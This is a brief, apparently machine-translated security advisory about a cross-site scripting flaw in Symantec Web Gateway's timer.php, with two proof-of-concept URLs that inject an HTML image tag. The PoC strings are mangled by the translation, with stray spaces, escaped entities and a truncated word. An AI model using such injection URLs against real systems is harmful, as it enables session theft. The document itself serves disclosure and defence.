Release date:
Updated on:
Affected Systems:
Symantec Web Gateway 5.0.1
Entrust Web Gateway 5.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53396
Symantec Web Gateway is a Symantec Enterprise Web threat protection solution.
Symantec Web Gateway has a cross-site scripting vulnerability. Attackers can exploit this vulnerability to execute arbitrary script code and steal Cookie authentication creden.
<* Source: B00y @
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/spywall/timer.php? D = 4099 & amp; l = 22665 '& lt; img src = "myimage.jpg" & gt; & amp; profile = 40
Http://www.example.com/spywall/timer.php? D = 4099 & amp; l = & lt; img src = "myimage.jpg" & gt; & amp; profile = 40
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Symantec
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.symantec.com/business/security_response/